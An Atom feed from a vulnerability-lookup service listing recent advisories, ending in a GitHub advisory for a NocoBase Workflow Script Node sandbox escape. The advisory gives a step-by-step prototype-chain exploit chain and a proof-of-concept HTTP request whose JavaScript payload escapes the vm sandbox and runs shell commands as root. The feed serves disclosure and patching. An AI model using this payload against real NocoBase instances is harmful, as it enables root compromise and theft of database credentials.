<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-07T02:26:24.928441+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-278776</id>
    <title>EUVD-2026-278776</title>
    <updated>2026-10-07T02:26:25.006409+00:00</updated>
    <content>EUVD-2026-278776</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-278776"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-34156</id>
    <title>fkie_cve-2026-34156</title>
    <updated>2026-10-07T02:26:25.006449+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.28, NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr. An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution as root. This issue has been patched in version 2.0.28.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-34156"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-px3p-vgh9-m57c</id>
    <title>GHSA-px3p-vgh9-m57c — NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node</title>
    <updated>2026-10-07T02:26:25.006485+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: @nocobase/plugin-workflow-javascript</p>
<p>`##` Summary</p>
<p>NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js `vm` sandbox with a custom `require` allowlist (controlled by `WORKFLOW_SCRIPT_MODULES` env var). However, the `console` object passed into the sandbox context exposes host-realm `WritableWorkerStdio` stream objects via `console._stdout` and `console._stderr`.</p>
<p>An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.</p>
<p>## Exploit Chain</p>
<p>1. `console._stdout.constructor.constructor` → host-realm `Function` constructor
2. `Function('return process')()` → Node.js `process` object
3. `process.mainModule.require('child_process')` → unrestricted module loading
4. `child_process.execSync('id')` → RCE as root</p>
<p>This completely bypasses the `customRequire` allowlist.</p>
<p>## Impact</p>
<p>- Remote Code Execution as root (uid=0) inside Docker container
- Database credential theft (`DB_PASSWORD`, `INIT_ROOT_PASSWORD` from `process.env`)
- Arbitrary file read/write via `require('fs')`
- Reverse shell confirmed
- Outbound network access for lateral movement</p>
<p>## Proof of Concept</p>
<p>**HTTP Request:**</p>
<p>POST /api/flow_nodes:test
Authorization: Bearer &lt;JWT_TOKEN&gt;
Content-Type: application/json</p>
<p>{
  "type": "script",
  "config": {
    "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();",
    "timeout": 5000…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-px3p-vgh9-m57c"/>
  </entry>
</feed>
